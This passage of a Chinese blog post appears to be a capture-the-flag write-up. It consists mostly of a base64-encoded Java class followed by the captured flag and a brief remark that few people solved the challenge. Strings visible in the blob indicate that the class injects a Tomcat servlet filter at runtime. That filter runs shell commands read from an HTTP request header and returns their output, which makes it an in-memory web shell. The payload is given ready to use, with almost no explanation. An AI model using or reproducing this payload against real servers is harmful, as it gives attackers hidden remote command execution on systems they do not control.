gcBLwwBMAExDAEyATMBAAtmaWx0ZXJTdGFydAEAD2phdmEvbGFuZy9DbGFzcwwBNAE1BwE2DAE3ATgMATkBJwEAE2phdmEvbGFuZy9FeGNlcHRpb24BABBqYXZhL2xhbmcvT2JqZWN0AQAUamF2YXgvc2VydmxldC9GaWx0ZXIBAB5qYXZheC9zZXJ2bGV0L1NlcnZsZXRFeGNlcHRpb24BABxqYXZheC9zZXJ2bGV0L1NlcnZsZXRSZXF1ZXN0AQAdamF2YXgvc2VydmxldC9TZXJ2bGV0UmVzcG9uc2UBABlqYXZheC9zZXJ2bGV0L0ZpbHRlckNoYWluAQATamF2YS9pby9JT0V4Y2VwdGlvbgcBOgEAKGphdmF4L3NlcnZsZXQvRmlsdGVyUmVnaXN0cmF0aW9uJER5bmFtaWMBABxqYXZheC9zZXJ2bGV0L1NlcnZsZXRDb250ZXh0AQAXamF2YS9sYW5nL3JlZmxlY3QvRmllbGQBABNqYXZhL2xhbmcvVGhyb3dhYmxlAQAKZ2V0U2Vzc2lvbgEAIigpTGphdmF4L3NlcnZsZXQvaHR0cC9IdHRwU2Vzc2lvbjsBAAlnZXRIZWFkZXIBACYoTGphdmEvbGFuZy9TdHJpbmc7KUxqYXZhL2xhbmcvU3RyaW5nOwEAEGphdmEvbGFuZy9TeXN0ZW0BAANvdXQBABVMamF2YS9pby9QcmludFN0cmVhbTsBABNqYXZhL2lvL1ByaW50U3RyZWFtAQAHcHJpbnRsbgEAFShMamF2YS9sYW5nL1N0cmluZzspVgEACXNldEhlYWRlcgEAJyhMamF2YS9sYW5nL1N0cmluZztMamF2YS9sYW5nL1N0cmluZzspVgEABXNwbGl0AQAnKExqYXZhL2xhbmcvU3RyaW5nOylbTGphdmEvbGFuZy9TdHJpbmc7AQAWKFtMamF2YS9sYW5nL1N0cmluZzspVgEAE3JlZGlyZWN0RXJyb3JTdHJlYW0BAB0oWilMamF2YS9sYW5nL1Byb2Nlc3NCdWlsZGVyOwEABXN0YXJ0AQAVKClMamF2YS9sYW5nL1Byb2Nlc3M7AQARamF2YS9sYW5nL1Byb2Nlc3MBAA5nZXRJbnB1dFN0cmVhbQEAFygpTGphdmEvaW8vSW5wdXRTdHJlYW07AQAYKExqYXZhL2lvL0lucHV0U3RyZWFtOylWAQATKExqYXZhL2lvL1JlYWRlcjspVgEABWxpbmVzAQAbKClMamF2YS91dGlsL3N0cmVhbS9TdHJlYW07AQANbGluZVNlcGFyYXRvcgEAFCgpTGphdmEvbGFuZy9TdHJpbmc7AQAbamF2YS91dGlsL3N0cmVhbS9Db2xsZWN0b3JzAQAHam9pbmluZwEANihMamF2YS9sYW5nL0NoYXJTZXF1ZW5jZTspTGphdmEvdXRpbC9zdHJlYW0vQ29sbGVjdG9yOwEAF2phdmEvdXRpbC9zdHJlYW0vU3RyZWFtAQAHY29sbGVjdAEAMChMamF2YS91dGlsL3N0cmVhbS9Db2xsZWN0b3I7KUxqYXZhL2xhbmcvT2JqZWN0OwEAQChMamF2YXgvc2VydmxldC9TZXJ2bGV0UmVxdWVzdDtMamF2YXgvc2VydmxldC9TZXJ2bGV0UmVzcG9uc2U7KVYBAA9wcmludFN0YWNrVHJhY2UBABFnZXRTZXJ2bGV0Q29udGV4dAEAICgpTGphdmF4L3NlcnZsZXQvU2VydmxldENvbnRleHQ7AQAVZ2V0RmlsdGVyUmVnaXN0cmF0aW9uAQA2KExqYXZhL2xhbmcvU3RyaW5nOylMamF2YXgvc2VydmxldC9GaWx0ZXJSZWdpc3RyYXRpb247AQAIZ2V0Q2xhc3MBABMoKUxqYXZhL2xhbmcvQ2xhc3M7AQAQZ2V0RGVjbGFyZWRGaWVsZAEALShMamF2YS9sYW5nL1N0cmluZzspTGphdmEvbGFuZy9yZWZsZWN0L0ZpZWxkOwEADXNldEFjY2Vzc2libGUBAAQoWilWAQADZ2V0AQAmKExqYXZhL2xhbmcvT2JqZWN0OylMamF2YS9sYW5nL09iamVjdDsBACJvcmcvYXBhY2hlL2NhdGFsaW5hL0xpZmVjeWNsZVN0YXRlAQANU1RBUlRJTkdfUFJFUAEAJExvcmcvYXBhY2hlL2NhdGFsaW5hL0xpZmVjeWNsZVN0YXRlOwEAA3NldAEAJyhMamF2YS9sYW5nL09iamVjdDtMamF2YS9sYW5nL09iamVjdDspVgEACWFkZEZpbHRlcgEAVChMamF2YS9sYW5nL1N0cmluZztMamF2YXgvc2VydmxldC9GaWx0ZXI7KUxqYXZheC9zZXJ2bGV0L0ZpbHRlclJlZ2lzdHJhdGlvbiREeW5hbWljOwEAHGphdmF4L3NlcnZsZXQvRGlzcGF0Y2hlclR5cGUBAAdSRVFVRVNUAQAeTGphdmF4L3NlcnZsZXQvRGlzcGF0Y2hlclR5cGU7AQARamF2YS91dGlsL0VudW1TZXQBAAJvZgEAJShMamF2YS9sYW5nL0VudW07KUxqYXZhL3V0aWwvRW51bVNldDsBABhhZGRNYXBwaW5nRm9yVXJsUGF0dGVybnMBACooTGphdmEvdXRpbC9FbnVtU2V0O1pbTGphdmEvbGFuZy9TdHJpbmc7KVYBAAlnZXRNZXRob2QBAEAoTGphdmEvbGFuZy9TdHJpbmc7W0xqYXZhL2xhbmcvQ2xhc3M7KUxqYXZhL2xhbmcvcmVmbGVjdC9NZXRob2Q7AQAYamF2YS9sYW5nL3JlZmxlY3QvTWV0aG9kAQAGaW52b2tlAQA5KExqYXZhL2xhbmcvT2JqZWN0O1tMamF2YS9sYW5nL09iamVjdDspTGphdmEvbGFuZy9PYmplY3Q7AQAHU1RBUlRFRAEAIGphdmF4L3NlcnZsZXQvRmlsdGVyUmVnaXN0cmF0aW9uACEAJQBEAAEARQADAAIARgBHAAAAAgBIAEkAAAACAEoASwAAAAYAAQBMAE0AAQBOAAAASgACAAEAAAAUKrcAASoBtQACKgG1AAMqAbUABLEAAAACAE8AAAASAAQAAAAKAAQACwAJAAwADgANAFAAAAAMAAEAAAAUAFEAUgAAAAEAUwBUAAIATgAAADUAAAACAAAAAbEAAAACAE8AAAAGAAEAAAARAFAAAAAWAAIAAAABAFEAUgAAAAAAAQBVAFYAAQBXAAAABAABAFgAAQBZAE0AAQBOAAAAKwAAAAEAAAABsQAAAAIATwAAAAYAAQAAABIAUAAAAAwAAQAAAAEAUQBSAAAAAQBaAFsAAgBOAAABmAAFAAsAAACaK8AABToELMAABjoFGQS5AAcBADoGGQQSCLkACQIAOgeyAAoZB7YACxkHxgBlGQUSDBINuQAOAwC7AA9ZGQcSELYAEbcAEgS2ABO2ABQ6CBkItgAVOgm7ABZZuwAXWRkJtwAYtwAZtgAauAAbuAAcuQAdAgDAAB46CrIAChIftgALGQUSIBkKuQAOAwCnAA0tGQQZBbkAIQMAsQAAAAMATwAAAE4AEwAAABUABgAWAAwAFwAVABgAIAAZACgAGgAtABwAOAAeAEcAHwBKACAATwAjAFYAJgBmACcAaQAoAHkAKQCBACoAjAAsAI8ALQCZAC8AUAAAAHAACwBPAD0AXABdAAgAVgA2AF4AXwAJAHkAEwBgAGEACgAAAJoAUQBSAAAAAACaAGIAYwABAAAAmgBkAGUAAgAAAJoAZgBnAAMABgCUAEYARwAEAAwAjgBIAGgABQAVAIUASgBLAAYAIAB6AGkAYQAHAGoAAAAiAAL/AI8ACAcAawcAbAcAbQcAbgcAbwcAcAcAcQcAcgAACQBXAAAABgACAHMAWAABAHQAdQABAE4AAADOAAQABAAAAEIrwAAiwAAiTSosBTLAACO1AAQqLAQywAAktQADKiwDMsAABbUAArsAJVm3ACYSJxIoKrQAArgAKacACE4ttgArBKwAAQAmADgAOwAqAAMATwAAACYACQAAADIACAAzABIANAAcADUAJgA4ADgAOwA7ADkAPAA6AEAAPQBQAAAAKgAEADwABAB2AHcAAwAAAEIAUQBSAAAAAABCAHgAeQABAAgAOgB6AHsAAgBqAAAAFgAC/wA7AAMHAGsHAHwHACIAAQcAfQQACQB%2bAH8AAgBOAAACVgAHAAwAAADqLbkALAEAOgQZBCu5AC0CAMcA2QE6BQE6BgE6BwE6CAE6CRkEtgAuEi%2b2ADA6BRkFBLYAMRkFGQS2ADLAADM6BhkGtgAuEi%2b2ADA6BRkFBLYAMRkFGQa2ADLAADQ6BxI1Eja2ADA6CBkIBLYAMRkIGQeyADe2ADgZBCsquQA5AwA6CRkJsgA6uAA7AwS9AB5ZAyxTuQA8BAASNBI9A70APrYAPzoKGQoEtgBAGQoZBwG2AEFXGQgZB7IAQrYAOBkIGQeyAEK2ADinACE6ChkIGQeyAEK2ADinABI6CxkIGQeyAEK2ADgZC7%2bxAAQAIgC%2bAMsAQwAiAL4A2gAAAMsAzQDaAAAA2gDcANoAAAADAE8AAAB6AB4AAABBAAgAQgATAEMAFgBEABkARQAcAEYAHwBHACIASgAuAEsANABMAEAATQBMAE4AUgBPAF4AUABnAFEAbQBSAHcAUwCCAFQAmABVAKUAVgCrAFcAtABYAL4AWwDIAFwAywBZAM0AWwDXAFwA2gBbAOYAXADpAF4AUAAAAHAACwClABkAgACBAAoAFgDTAIIAgwAFABkA0ACEAIUABgAcAM0AhgCHAAcAHwDKAIgAgwAIACIAxwCJAI0ACQAAAOoAjgCPAAAAAADqAJAAYQABAAAA6gCRAGEAAgAAAOoARgBHAAMACADiAJIAkwAEAGoAAABEAAP/AMsACgcAlAcAcgcAcgcAbwcAlQcAlgcAlwcAmAcAlgcAmQABBwCaTgcAm/8ADgAFBwCUBwByBwByBwBvBwCVAAAAVwAAAAQAAQAqAAIAnAAAAAIAnQCMAAAACgABAIoA8ACLBgk%3d

在这里插入图片描述
在这里插入图片描述

flag{cab20046-3945-f9f4-7125-7ca2703a31df}

配合B站官方一定能做出这道题,我看这道题只有四个人解出了,所以写个文档

  • 14
    点赞
  • 9
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

samRsa

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值